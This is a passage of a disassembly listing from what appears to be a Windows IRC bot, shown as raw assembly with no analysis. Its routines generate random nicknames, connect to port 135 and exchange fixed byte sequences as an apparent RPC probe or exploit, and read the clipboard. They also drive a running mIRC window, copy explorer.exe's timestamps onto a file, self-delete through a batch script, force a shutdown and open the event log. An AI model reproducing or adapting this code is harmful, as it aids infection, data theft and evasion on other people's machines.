var_2B = byte ptr -2Bh
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push 14h
lea eax, [ebp+var_2C]
push 0
push eax
call sub_41E4B0
add esp, 0Ch
call sub_41EB70
mov [ebp+var_4], eax
fild [ebp+var_4]
fmul ds:dbl_43C4D8
call sub_4201DC
cmp eax, 1
jnz short loc_418472
call sub_41EB70
call sub_41EB70
push 66h
cdq
pop ecx
idiv ecx
push ds:off_44F8F0[edx*4]
jmp short loc_41848B
; ---------------------------------------------------------------------------
loc_418472: ; CODE XREF: sub_418428+2F�j
call sub_41EB70
call sub_41EB70
cdq
mov ecx, 0C0h
idiv ecx
push ds:off_44F430[edx*4]
loc_41848B: ; CODE XREF: sub_418428+48�j
lea eax, [ebp+var_2C]
push eax
call sub_41F620
pop ecx
lea eax, [ebp+var_2C]
pop ecx
push ebx
push esi
push edi
push eax
call sub_41BC70
pop ecx
mov esi, eax
push 13h
mov [ebp+var_4], esi
pop eax
sub eax, esi
mov dword ptr [ebp+var_18+4], eax
call sub_41EB70
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul ds:dbl_43C4D0
call sub_4201DC
mov ebx, eax
call sub_41EB70
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fimul [ebp+var_4]
fmul ds:dbl_43C4C8
call sub_4201DC
cmp esi, 2
mov edi, offset a__2 ; "-|`_\\{[]}"
jle short loc_4184FE
cmp esi, 3
jnz short loc_4184F5
cmp ebx, 1
jz short loc_4184FE
loc_4184F5: ; CODE XREF: sub_418428+C6�j
cmp eax, 1
jnz loc_4185B7
loc_4184FE: ; CODE XREF: sub_418428+C1�j
; sub_418428+CB�j
call sub_41EB70
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul ds:dbl_43C4C0
call sub_4201DC
push ds:off_44F8F0[eax*4]
lea eax, [ebp+var_40]
push eax
call sub_41F620
lea ebx, [ebp+esi+var_2C]
movsx eax, byte ptr [ebx-1]
push eax
push edi
call sub_41F720
add esp, 10h
test eax, eax
jnz short loc_4185A4
movsx eax, [ebp+var_40]
push eax
push edi
call sub_41F720
pop ecx
test eax, eax
pop ecx
jnz short loc_4185A4
call sub_41EB70
mov dword ptr [ebp+var_10+4], eax
dec esi
fild dword ptr [ebp+var_10+4]
mov dword ptr [ebp+var_10+4], esi
fild dword ptr [ebp+var_10+4]
fmulp st(1), st
fmul ds:dbl_43C4C8
call sub_4201DC
cmp eax, 1
jnz short loc_4185A4
push edi
call sub_41BC70
and dword ptr [ebp+var_10+4], 0
mov dword ptr [ebp+var_10], eax
fild [ebp+var_10]
pop ecx
fstp qword ptr [ebp-8]
call sub_41EB70
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul qword ptr [ebp-8]
fmul ds:dbl_43C4C8
call sub_4201DC
mov al, byte ptr ds:a__2[eax] ; "-|`_\\{[]}"
mov [ebx], al
loc_4185A4: ; CODE XREF: sub_418428+110�j
; sub_418428+121�j ...
push dword ptr [ebp+var_18+4]
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_41FAC0
add esp, 0Ch
loc_4185B7: ; CODE XREF: sub_418428+D0�j
lea eax, [ebp+var_2C]
push eax
call sub_41BC70
mov esi, eax
mov [ebp+var_4], esi
movsx eax, [ebp+esi+var_2D]
push eax
call sub_4218B0
pop ecx
test eax, eax
pop ecx
jnz loc_41880E
movsx eax, [ebp+esi+var_2D]
push eax
push edi
xor ebx, ebx
call sub_41F720
pop ecx
test eax, eax
pop ecx
jnz loc_418710
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
lea eax, [esi+3]
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_43C4C8
call sub_4201DC
cmp esi, 3
jz short loc_418621
cmp eax, 1
jnz loc_418710
loc_418621: ; CODE XREF: sub_418428+1EE�j
push 2
cdq
pop ecx
idiv ecx
cmp edx, 1
jnz short loc_418665
push edi
call sub_41BC70
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp [ebp+var_10]
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul [ebp+var_10]
fmul ds:dbl_43C4C8
call sub_4201DC
mov al, byte ptr ds:a__2[eax] ; "-|`_\\{[]}"
mov [ebp+esi+var_2C], al
jmp short loc_418683
; ---------------------------------------------------------------------------
loc_418665: ; CODE XREF: sub_418428+202�j
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4B8
call sub_4201DC
mov cl, 41h
sub cl, al
mov [ebp+esi+var_2C], cl
loc_418683: ; CODE XREF: sub_418428+23B�j
inc esi
xor ebx, ebx
mov [ebp+var_4], esi
inc ebx
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4B0
call sub_4201DC
cmp esi, 3
jz short loc_4186A9
cmp eax, ebx
jnz short loc_418710
loc_4186A9: ; CODE XREF: sub_418428+27B�j
push 2
pop ebx
cdq
mov ecx, ebx
idiv ecx
test edx, edx
jnz short loc_4186EE
push edi
call sub_41BC70
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp [ebp+var_10]
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul [ebp+var_10]
fmul ds:dbl_43C4C8
call sub_4201DC
mov al, byte ptr ds:a__2[eax] ; "-|`_\\{[]}"
mov [ebp+esi+var_2C], al
jmp short loc_41870C
; ---------------------------------------------------------------------------
loc_4186EE: ; CODE XREF: sub_418428+28B�j
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4B8
call sub_4201DC
mov cl, 41h
sub cl, al
mov [ebp+esi+var_2C], cl
loc_41870C: ; CODE XREF: sub_418428+2C4�j
inc esi
mov [ebp+var_4], esi
loc_418710: ; CODE XREF: sub_418428+1C4�j
; sub_418428+1F3�j ...
cmp esi, 6
jge short loc_418790
call sub_41EB70
cmp esi, 5
jge short loc_41872D
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4D0
jmp short loc_418746
; ---------------------------------------------------------------------------
loc_41872D: ; CODE XREF: sub_418428+2F5�j
push 8
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
pop eax
sub eax, esi
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_43C4C8
loc_418746: ; CODE XREF: sub_418428+303�j
call sub_4201DC
test eax, eax
jnz short loc_418769
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4A8
call sub_4201DC
mov cl, 30h
jmp short loc_418786
; ---------------------------------------------------------------------------
loc_418769: ; CODE XREF: sub_418428+325�j
cmp eax, 1
jnz short loc_418790
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4B8
call sub_4201DC
mov cl, 41h
loc_418786: ; CODE XREF: sub_418428+33F�j
sub cl, al
mov [ebp+esi+var_2C], cl
inc esi
mov [ebp+var_4], esi
loc_418790: ; CODE XREF: sub_418428+2EB�j
; sub_418428+344�j
cmp ebx, 2
jge short loc_41880E
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul ds:dbl_43C4C8
call sub_4201DC
cmp eax, 1
jnz short loc_41880E
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4A8
call sub_4201DC
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2C], cl
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4A0
call sub_4201DC
cmp eax, 1
jnz short loc_41880E
cmp ebx, eax
jge short loc_41880E
call sub_41EB70
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C498
call sub_4201DC
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2B], cl
loc_41880E: ; CODE XREF: sub_418428+1AC�j
; sub_418428+36B�j ...
lea eax, [ebp+var_2C]
push 14h
push eax
push [ebp+arg_0]
call sub_41E510
mov eax, [ebp+arg_0]
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_418428 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418827 proc near ; CODE XREF: _0:00418984�p _0:004189AB�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_418855
loc_418838: ; CODE XREF: sub_418827+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_421BD0
add esp, 0Ch
test eax, eax
jz short loc_41885B
inc esi
cmp esi, edi
jl short loc_418838
loc_418855: ; CODE XREF: sub_418827+F�j
xor al, al
loc_418857: ; CODE XREF: sub_418827+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41885B: ; CODE XREF: sub_418827+27�j
mov al, 1
jmp short loc_418857
sub_418827 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2010h
call sub_41EF80
mov eax, [ebp+0Ch]
push esi
dec eax
push edi
jz short loc_4188A0
dec eax
jz short loc_41887E
dec eax
loc_418878: ; CODE XREF: _0:004188B6�j
xor eax, eax
loc_41887A: ; CODE XREF: _0:0041889E�j _0:004189C8�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41887E: ; CODE XREF: _0:00418875�j
push 3
push 1388h
push dword ptr [ebp+8]
call ds:dword_4E3008 ; inet_addr
push eax
call sub_40C611
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_41887A
; ---------------------------------------------------------------------------
loc_4188A0: ; CODE XREF: _0:00418872�j
push 6
push 1
push 2
call ds:dword_4E3048 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+0Ch], esi
jz short loc_418878
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp-10h]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
mov word ptr [ebp-10h], 2
push 87h
call ds:dword_4E2FC8 ; htons
push dword ptr [ebp+8]
mov [ebp-0Eh], ax
call sub_40AD91
pop ecx
mov [ebp-0Ch], eax
lea eax, [ebp-10h]
push 10h
push eax
push esi
call ds:dword_4E2F70 ; connect
cmp eax, edi
jz loc_4189BC
push ebx
push 48h
push offset dword_44FAF8
push esi
call ds:dword_4E3018 ; send
cmp eax, edi
jz loc_4189BC
mov esi, 2000h
push ebx
lea eax, [ebp-2010h]
push esi
push eax
push dword ptr [ebp+0Ch]
call ds:dword_4E2FE0 ; recv
cmp eax, edi
jz loc_4189BC
cmp byte ptr [ebp-200Eh], 0Ch
jnz short loc_4189BC
push ebx
push 18h
push offset dword_44FB44
push dword ptr [ebp+0Ch]
call ds:dword_4E3018 ; send
cmp eax, edi
jz short loc_4189BC
push ebx
lea eax, [ebp-2010h]
push esi
push eax
push dword ptr [ebp+0Ch]
call ds:dword_4E2FE0 ; recv
mov esi, eax
cmp esi, edi
jz short loc_4189BC
cmp byte ptr [ebp-200Eh], 2
jnz short loc_4189BC
push 10h
push offset loc_44FB60
lea eax, [ebp-2010h]
push esi
push eax
call sub_418827
add esp, 10h
test al, al
jz short loc_41899C
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_4189BC
; ---------------------------------------------------------------------------
loc_41899C: ; CODE XREF: _0:0041898E�j
push 10h
push offset dword_44FB74
lea eax, [ebp-2010h]
push esi
push eax
call sub_418827
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_4189BC: ; CODE XREF: _0:004188FA�j _0:00418911�j ...
push dword ptr [ebp+0Ch]
call ds:dword_4E3060 ; closesocket
mov eax, ebx
pop ebx
jmp loc_41887A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4189CD proc near ; CODE XREF: sub_401C87+BA7�p
; sub_401C87+BE1�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_418A58
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_418A58
cmp [ebp+arg_8], esi
jz short loc_418A58
cmp byte ptr [eax], 0
jz short loc_418A58
push ebx
push edi
call sub_43AEA0
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_418A53
push [ebp+arg_4]
push edi
call sub_41EBB0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_418A4C
sub eax, edi
push eax
push edi
push ebx
call sub_41E510
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_41BC70
push eax
push [ebp+arg_8]
push ebx
call sub_41FAC0
push [ebp+arg_4]
call sub_41BC70
add eax, esi
push eax
push ebx
call sub_41F630
push ebx
push edi
call sub_41F620
add esp, 30h
mov esi, edi
loc_418A4C: ; CODE XREF: sub_4189CD+3C�j
push ebx
call sub_41C9D0
pop ecx
loc_418A53: ; CODE XREF: sub_4189CD+2B�j
mov eax, esi
pop ebx
jmp short loc_418A5A
; ---------------------------------------------------------------------------
loc_418A58: ; CODE XREF: sub_4189CD+C�j
; sub_4189CD+13�j ...
xor eax, eax
loc_418A5A: ; CODE XREF: sub_4189CD+89�j
pop edi
pop esi
pop ebp
retn
sub_4189CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A5E proc near ; CODE XREF: sub_401B0B+E9�p
; sub_410B14+F4�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
xor ebx, ebx
push 7D0h
lea eax, [ebp+var_7D0]
push ebx
push eax
call sub_41E4B0
mov esi, [ebp+arg_0]
push esi
call sub_41BC70
xor edi, edi
add esp, 10h
inc edi
cmp eax, edi
jge short loc_418A96
or eax, 0FFFFFFFFh
jmp short loc_418AFD
; ---------------------------------------------------------------------------
loc_418A96: ; CODE XREF: sub_418A5E+31�j
xor ecx, ecx
cmp eax, ebx
mov [ebp+var_7D0], esi
jle short loc_418AB7
loc_418AA2: ; CODE XREF: sub_418A5E+57�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_418AAF
cmp dl, 0Dh
jnz short loc_418AB2
loc_418AAF: ; CODE XREF: sub_418A5E+4A�j
mov [ecx+esi], bl
loc_418AB2: ; CODE XREF: sub_418A5E+4F�j
inc ecx
cmp ecx, eax
jl short loc_418AA2
loc_418AB7: ; CODE XREF: sub_418A5E+42�j
xor edx, edx
cmp eax, ebx
jle short loc_418ADF
loc_418ABD: ; CODE XREF: sub_418A5E+7F�j
cmp [edx+esi], bl
jnz short loc_418ADA
lea ecx, [edx+esi+1]
cmp [ecx], bl
jz short loc_418ADA
cmp edi, 1F4h
jge short loc_418ADF
mov [ebp+edi*4+var_7D0], ecx
inc edi
loc_418ADA: ; CODE XREF: sub_418A5E+62�j
; sub_418A5E+6A�j
inc edx
cmp edx, eax
jl short loc_418ABD
loc_418ADF: ; CODE XREF: sub_418A5E+5D�j
; sub_418A5E+72�j
cmp [ebp+arg_4], ebx
jz short loc_418AFB
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_41FBF0
add esp, 0Ch
loc_418AFB: ; CODE XREF: sub_418A5E+84�j
mov eax, edi
loc_418AFD: ; CODE XREF: sub_418A5E+36�j
pop edi
pop esi
pop ebx
leave
retn
sub_418A5E endp
; =============== S U B R O U T I N E =======================================
sub_418B02 proc near ; CODE XREF: sub_418B5C+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_418B3B
push ebx
mov ebx, edi
loc_418B1F: ; CODE XREF: sub_418B02+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_418B3E
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_418B1F
pop ebx
loc_418B3B: ; CODE XREF: sub_418B02+18�j
pop edi
pop esi
retn
sub_418B02 endp
; =============== S U B R O U T I N E =======================================
sub_418B3E proc near ; CODE XREF: sub_418B02+25�p
; sub_418B5C+69�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_421C90
cmp al, 61h
pop ecx
jl short loc_418B59
cmp al, 7Ah
jg short loc_418B59
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_418B59: ; CODE XREF: sub_418B3E+E�j
; sub_418B3E+12�j
xor eax, eax
retn
sub_418B3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418B5C proc near ; CODE XREF: _0:00415B45�p _0:00415BCA�p ...
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_41EF80
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41BC70
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_41BC70
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_418B02
add esp, 14h
dec esi
mov edi, esi
jmp short loc_418C0E
; ---------------------------------------------------------------------------
loc_418B9C: ; CODE XREF: sub_418B5C+B4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_421C90
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_421C90
pop ecx
cmp eax, ebx
pop ecx
jz short loc_418C0C
loc_418BBE: ; CODE XREF: sub_418B5C+AE�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_418B3E
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_418BDF
mov eax, ecx
loc_418BDF: ; CODE XREF: sub_418B5C+7F�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_418C1C
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_421C90
movsx ecx, byte ptr [edi+ebx]
push ecx
mov [ebp+var_8], eax
call sub_421C90
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_418BBE
loc_418C0C: ; CODE XREF: sub_418B5C+60�j
dec edi
dec esi
loc_418C0E: ; CODE XREF: sub_418B5C+3E�j
test esi, esi
jg short loc_418B9C
mov eax, [ebp+arg_0]
add eax, edi
loc_418C17: ; CODE XREF: sub_418B5C+C2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_418C1C: ; CODE XREF: sub_418B5C+88�j
xor eax, eax
jmp short loc_418C17
sub_418B5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418C20 proc near ; CODE XREF: sub_401C87+6862�p
; sub_401C87+7921�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_4F542C ; FormatMessageA
lea eax, [ebp+var_100]
loc_418C59: ; CODE XREF: sub_418C20+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_418C65
cmp cl, 9
jnz short loc_418C68
loc_418C65: ; CODE XREF: sub_418C20+3E�j
inc eax
jmp short loc_418C59
; ---------------------------------------------------------------------------
loc_418C68: ; CODE XREF: sub_418C20+43�j
; sub_418C20+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_418C82
mov cl, [eax]
cmp cl, 2Eh
jz short loc_418C68
cmp cl, 21h
jl short loc_418C68
loc_418C82: ; CODE XREF: sub_418C20+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset dword_4F2788
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_41EC30
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_418C20 endp
; =============== S U B R O U T I N E =======================================
sub_418CAA proc near ; CODE XREF: sub_401C87+2484�p
push esi
push 0
call ds:dword_4E2F98 ; OpenClipboard
test eax, eax
jz short loc_418CE1
push 1
call ds:dword_4E2FB8 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_418CE1
push edi
push esi
call ds:dword_4F5434 ; GlobalLock
push esi
mov edi, eax
call ds:dword_4F5430 ; GlobalUnlock
call ds:dword_4E301C ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_418CE1: ; CODE XREF: sub_418CAA+B�j
; sub_418CAA+19�j
xor eax, eax
pop esi
retn
sub_418CAA endp
; =============== S U B R O U T I N E =======================================
sub_418CE5 proc near ; CODE XREF: sub_401C87+76CC�p
arg_0 = dword ptr 4
push ebp
push esi
xor esi, esi
push esi
push offset aMirc_2 ; "mIRC"
call ds:dword_4E2FD4 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_418D65
push ebx
push edi
push offset aMirc_3 ; "mIRC"
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:off_4F5440
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call ds:off_4F543C
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_41EA60
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call ds:dword_4E3024 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call ds:dword_4E3024 ; SendMessageA
push ebx
call ds:off_4F5438
push edi
call ds:off_4F533C
xor eax, eax
pop edi
inc eax
pop ebx
jmp short loc_418D67
; ---------------------------------------------------------------------------
loc_418D65: ; CODE XREF: sub_418CE5+14�j
xor eax, eax
loc_418D67: ; CODE XREF: sub_418CE5+7E�j
pop esi
pop ebp
retn
sub_418CE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418D6A proc near ; CODE XREF: sub_401404+200�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call ds:off_4E3080
test eax, eax
jz short loc_418E09
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:off_4F53C0
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; sub_50B2B0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_418E09
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_4F5448 ; GetFileTime
push ebx
mov ebx, ds:off_4F533C
call ebx ; sub_50B3D5
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; sub_50B2B0
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_418E09
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_4F5444 ; SetFileTime
push esi
call ebx ; sub_50B3D5
loc_418E09: ; CODE XREF: sub_418D6A+2A�j
; sub_418D6A+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_418D6A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 454h
push esi
xor esi, esi
push 10h
lea eax, [ebp-10h]
push esi
push eax
call sub_41E4B0
push 44h
lea eax, [ebp-54h]
push esi
push eax
call sub_41E4B0
push dword ptr [ebp+0Ch]
lea eax, [ebp-454h]
mov dword ptr [ebp-54h], 44h
mov dword ptr [ebp-28h], 1
push dword ptr [ebp+8]
mov [ebp-24h], si
push offset aSS_5 ; "%s %s"
push 400h
push eax
call sub_41EC30
add esp, 2Ch
lea eax, [ebp-10h]
push eax
lea eax, [ebp-54h]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp-454h]
push esi
push eax
push dword ptr [ebp+8]
call ds:dword_4F5340 ; CreateProcessA
neg eax
sbb eax, eax
pop esi
and eax, [ebp-8]
leave
retn
; =============== S U B R O U T I N E =======================================
sub_418E8C proc near ; CODE XREF: sub_401C87+1662�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_41A2C9
pop ecx
pop ecx
push 50005h
push 6
call ds:dword_4E2F08 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_418E8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418EAE proc near ; CODE XREF: sub_401C87+2718�p
; sub_416D68+45F�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp ds:dword_43F094, esi
push edi
jz short loc_418ED2
cmp ds:dword_4E3094, esi
jnz short loc_418ED2
push esi
call sub_401000
pop ecx
loc_418ED2: ; CODE XREF: sub_418EAE+13�j
; sub_418EAE+1B�j
call sub_40B854
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_4F5384 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_41EA60
add esp, 0Ch
lea eax, [ebp+var_260]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:off_4F53C0
mov edi, eax
cmp edi, esi
jbe loc_419032
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_41EA60
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_764]
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
call ds:dword_4F53B4 ; WriteFile
push edi
call ds:off_4F533C
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_41E4B0
push 44h
lea eax, [ebp+var_58]
pop edi
push edi
push esi
push eax
call sub_41E4B0
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset dword_4F2988
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:off_4F5370
push eax
call ds:off_4F5344
lea eax, [ebp+var_15C]
push eax
call ds:off_4F536C
cmp eax, 0FFFFFFFFh
jz short loc_418FDA
lea eax, [ebp+var_15C]
push 80h
push eax
call ds:dword_4F5368 ; SetFileAttributesA
loc_418FDA: ; CODE XREF: sub_418EAE+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_41EA60
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_4F544C ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call ds:dword_4F5340 ; CreateProcessA
loc_419032: ; CODE XREF: sub_418EAE+72�j
pop edi
pop esi
leave
retn
sub_418EAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419036 proc near ; CODE XREF: sub_401C87+729A�p
var_294 = byte ptr -294h
var_94 = dword ptr -94h
var_84 = dword ptr -84h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 294h
push edi
xor edi, edi
push 94h
lea eax, [ebp+var_94]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_94]
mov [ebp+var_94], 94h
push eax
call ds:dword_4F539C ; GetVersionExA
cmp [ebp+var_84], 2
jnz short loc_4190CC
push [ebp+arg_10]
push [ebp+arg_C]
call ds:dword_4E2F48 ; OpenEventLogA
push edi
